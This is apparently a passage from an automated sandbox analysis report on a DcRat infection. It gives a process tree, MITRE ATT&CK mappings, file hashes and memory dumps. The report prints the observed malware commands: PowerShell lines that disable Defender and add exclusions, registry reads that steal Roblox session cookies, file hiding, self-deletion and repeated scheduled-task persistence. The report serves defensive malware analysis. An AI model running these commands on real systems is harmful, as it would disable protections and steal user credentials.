PID 1224 wrote to memory of 2604	1224	sppsvc.exe	72
PID 1224 wrote to memory of 2604	1224	sppsvc.exe	72
PID 1224 wrote to memory of 2604	1224	sppsvc.exe	72
PID 2604 wrote to memory of 2624	2604	Saransk.exe	73
PID 2604 wrote to memory of 2624	2604	Saransk.exe	73
PID 2604 wrote to memory of 2624	2604	Saransk.exe	73
PID 2604 wrote to memory of 2576	2604	Saransk.exe	75
PID 2604 wrote to memory of 2576	2604	Saransk.exe	75
PID 2604 wrote to memory of 2576	2604	Saransk.exe	75
PID 2604 wrote to memory of 340	2604	Saransk.exe	78
PID 2604 wrote to memory of 340	2604	Saransk.exe	78
PID 2604 wrote to memory of 340	2604	Saransk.exe	78
PID 2604 wrote to memory of 1428	2604	Saransk.exe	79
PID 2604 wrote to memory of 1428	2604	Saransk.exe	79
PID 2604 wrote to memory of 1428	2604	Saransk.exe	79
PID 2604 wrote to memory of 560	2604	Saransk.exe	81
PID 2604 wrote to memory of 560	2604	Saransk.exe	81
PID 2604 wrote to memory of 560	2604	Saransk.exe	81
PID 2604 wrote to memory of 1836	2604	Saransk.exe	83
PID 2604 wrote to memory of 1836	2604	Saransk.exe	83
PID 2604 wrote to memory of 1836	2604	Saransk.exe	83
PID 2604 wrote to memory of 2616	2604	Saransk.exe	85
PID 2604 wrote to memory of 2616	2604	Saransk.exe	85
PID 2604 wrote to memory of 2616	2604	Saransk.exe	85
PID 2604 wrote to memory of 2572	2604	Saransk.exe	87
PID 2604 wrote to memory of 2572	2604	Saransk.exe	87
PID 2604 wrote to memory of 2572	2604	Saransk.exe	87
PID 2604 wrote to memory of 2528	2604	Saransk.exe	89
PID 2604 wrote to memory of 2528	2604	Saransk.exe	89
PID 2604 wrote to memory of 2528	2604	Saransk.exe	89
PID 2604 wrote to memory of 2104	2604	Saransk.exe	91
PID 2604 wrote to memory of 2104	2604	Saransk.exe	91
PID 2604 wrote to memory of 2104	2604	Saransk.exe	91
PID 2604 wrote to memory of 1704	2604	Saransk.exe	93
PID 2604 wrote to memory of 1704	2604	Saransk.exe	93
PID 2604 wrote to memory of 1704	2604	Saransk.exe	93
PID 1704 wrote to memory of 1284	1704	cmd.exe	95
PID 1704 wrote to memory of 1284	1704	cmd.exe	95
PID 1704 wrote to memory of 1284	1704	cmd.exe	95
PID 1224 wrote to memory of 2096	1224	sppsvc.exe	96
PID 1224 wrote to memory of 2096	1224	sppsvc.exe	96
PID 1224 wrote to memory of 2096	1224	sppsvc.exe	96
PID 2096 wrote to memory of 2688	2096	XClient.exe	97
PID 2096 wrote to memory of 2688	2096	XClient.exe	97
PID 2096 wrote to memory of 2688	2096	XClient.exe	97
PID 2096 wrote to memory of 2460	2096	XClient.exe	100
PID 2096 wrote to memory of 2460	2096	XClient.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2624	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Fluxus.exe
"C:\Users\Admin\AppData\Local\Temp\Fluxus.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\BlocksurrogatefontSessionnet\03haLikBPRnje6rQzk.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\BlocksurrogatefontSessionnet\XsJXDwhu5r8DMzzUSZrqYCfoHtHGhe.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\BlocksurrogatefontSessionnet\surrogatewininto.exe
      "C:\BlocksurrogatefontSessionnet\surrogatewininto.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe
        
        "C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1224
      - C:\Users\Admin\Downloads\Saransk.exe
        
        "C:\Users\Admin\Downloads\Saransk.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2604
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\Downloads\Saransk.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Saransk.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2104
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Saransk.exe" && pause
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1704
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:1284
      - C:\Users\Admin\Downloads\XClient.exe
        
        "C:\Users\Admin\Downloads\XClient.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\XClient.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Uninstall Information\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Uninstall Information\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Windows\Web\Wallpaper\Landscapes\cmd.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Web\Wallpaper\Landscapes\cmd.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Wallpaper\Landscapes\cmd.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\taskhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\Chrome\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\BlocksurrogatefontSessionnet\03haLikBPRnje6rQzk.vbe

Filesize
235B

MD5
ab3a92d510f3c131b2b5a11a28a34f26

SHA1
c12631dd1e367cfdbe403f049ff44331d4aac440

SHA256
dbb586c0aecf846efd185ba15ed791ae24e82521f544c82e8763f74cf846d0a2

SHA512
ef0743772a294ef033df1168e97aec6147c5e2466c5f6afaac535b10c61b78656ceaa87bc53e9644dad9f31fd3c159de1d9b63dc6cf316901d72fb98f62af318

Download Submit
C:\BlocksurrogatefontSessionnet\XsJXDwhu5r8DMzzUSZrqYCfoHtHGhe.bat

Filesize
54B

MD5
0bd5533e612cc8c61b7076c57f58cc4f

SHA1
f64d363694825a79c3922de1424fc48cd2ef2ac7

SHA256
fd04ca722e97b5f52eafd7bf7e50acceab15d4c3bd0be4b7df77b42dc8946623

SHA512
46698359689e00f54875bc3f1f83ac8c9a3098b218a068fd0dcb95965269577271dc8b5124d9c473ddbffb9a5bb2be577823401d8e4b615d7eab33baad2d45e5

Download Submit
C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe

Filesize
512KB

MD5
7d7244e0908da7295b5aa821889d8f88

SHA1
dfc6a792bfcca38935533bf6f7f27c5102a5c926

SHA256
de8ad4231f45f90d53539472807518ead628ae64e98851a0fb16770c491a7d70

SHA512
76b4506917657f8369c237e7e03909b3320e378fb194b6bed33783ec7dbde2a8f1d734450544146e0e8639e032320796ce04975a0ba22c28bc6bee119d101714

Download Submit
C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\sppsvc.exe

Filesize
409KB

MD5
a670119d8d00f39e597a2ab5687e08de

SHA1
f669d5edda8acba81708a196d04e2333cb24387e

SHA256
863356b5702b6eabc69ba92efcb31ea17f9d76c3337cab76b22557e89d32fda2

SHA512
4fd15d3dac71578d05c6391409db6cfcbb0c362c92ee686b7a737608eb5bfad5cff96e92421556ffb6283920e05b52791c7183b547dcd0a5321877ed4b72c393

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab403D.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4050.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3f708bee3de7b81db9be39770415af20

SHA1
628267c851ba46828c640b251a9c7249be5e4d58

SHA256
2d303696be908a07189ba280a044e4294faca68b15810c5b0cbc6f77769c9892

SHA512
1e12c6183ae8a679a833cb602160e129195280c3f4d4a994f313a30dcc2ca16b1e7297e0ce9cb000282de26145fa955148873eccd45e1e32befa5df4af459959

Download Submit
C:\Users\Admin\Downloads\Saransk.exe

Filesize
231KB

MD5
75532fbae465455014a78c069d9aa75e

SHA1
08a75d652909d022902fa53c1858703dcd3ec25b

SHA256
789bbe3a4b1360dc12f86adf6945d343163e8fbc2bb63b230b2fd3cea1b22984

SHA512
d9b26f46ca9b392b9f95b920d725013833aa89a4ec2d57d4be8e3677915e2a2d371b82cd55c9ae423cf24963bae4c190f5d56e7781818b39eb8faebcbfb351cc

Download Submit
C:\Users\Admin\Downloads\XClient.exe

Filesize
37KB

MD5
69780e9e387f995fa93bc6d20eafb2a1

SHA1
8c67a692301bd831265fdfc76c8380d2fa5b714e

SHA256
545ca37ef61a7f2cd81f91d376586c43b12b244430fe05a5c3794d2beb62b765

SHA512
d9e681a3d52e96aaf1102a8ad57dc52922d91718b1b4c347fd9a285610e230ae4868632c0e2aa27ca4aac1dea35dc749aaf4faea9faa81a13a8eb577eba06ae3

Download Submit
\BlocksurrogatefontSessionnet\surrogatewininto.exe

Filesize
827KB

MD5
8332de8d3398c44e187bd985369e555f

SHA1
b28d85655a27a4c647fa74a433d57dfa8c8f0cd8

SHA256
4eb7eae923dd3bb3627eea6577eb0eda207863ee5cceb33814289d68eb9af7d1

SHA512
37b0ecfb78bdd52676c47399774ac4813a4e33def6c705221e33454a2f6780ef040def8493841856f29956bdd5371509a468ee6b94676aefc783d5ce33b008c4

Download Submit
memory/340-84-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/340-82-0x000007FEED7B0000-0x000007FEEE14D000-memory.dmp

Filesize
9.6MB

Download
memory/340-81-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/340-83-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/340-78-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/340-85-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/340-79-0x000007FEED7B0000-0x000007FEEE14D000-memory.dmp

Filesize
9.6MB

Download
memory/340-86-0x000007FEED7B0000-0x000007FEEE14D000-memory.dmp

Filesize
9.6MB

Download
memory/340-80-0x0000000002910000-0x0000000002918000-memory.dmp

Filesize
32KB

Download
memory/560-119-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/560-120-0x000007FEED5D0000-0x000007FEEDF6D000-memory.dmp

Filesize
9.6MB

Download
memory/560-117-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/560-115-0x000007FEED5D0000-0x000007FEEDF6D000-memory.dmp

Filesize
9.6MB

Download
memory/560-114-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/560-113-0x000007FEED5D0000-0x000007FEEDF6D000-memory.dmp

Filesize
9.6MB

Download
memory/560-118-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/1224-46-0x0000000000E90000-0x0000000000F66000-memory.dmp

Filesize
856KB

Download
memory/1224-47-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/1224-49-0x000000001B110000-0x000000001B190000-memory.dmp

Filesize
512KB

Download
memory/1224-50-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/1224-51-0x000000001B110000-0x000000001B190000-memory.dmp

Filesize
512KB

Download
memory/1428-106-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/1428-107-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/1428-101-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/1428-104-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1428-105-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1428-102-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/1428-103-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/2096-147-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2096-146-0x0000000000100000-0x0000000000110000-memory.dmp

Filesize
64KB

Download
memory/2460-165-0x000007FEED7B0000-0x000007FEEE14D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-166-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/2528-130-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/2528-129-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2528-136-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/2528-135-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download
memory/2528-134-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download
memory/2528-133-0x000007FEEDF70000-0x000007FEEE90D000-memory.dmp

Filesize
9.6MB

Download
memory/2528-132-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download
memory/2576-66-0x000007FEEE150000-0x000007FEEEAED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-70-0x0000000002CD0000-0x0000000002D50000-memory.dmp

Filesize
512KB

Download
memory/2576-65-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2576-67-0x0000000002CD0000-0x0000000002D50000-memory.dmp

Filesize
512KB

Download
memory/2576-64-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2576-72-0x000007FEEE150000-0x000007FEEEAED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-68-0x000007FEEE150000-0x000007FEEEAED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-71-0x0000000002CD0000-0x0000000002D50000-memory.dmp

Filesize
512KB

Download
memory/2576-69-0x0000000002CD0000-0x0000000002D50000-memory.dmp

Filesize
512KB

Download
memory/2604-58-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2604-140-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

Filesize
9.9MB

Download
memory/2604-59-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
memory/2604-131-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
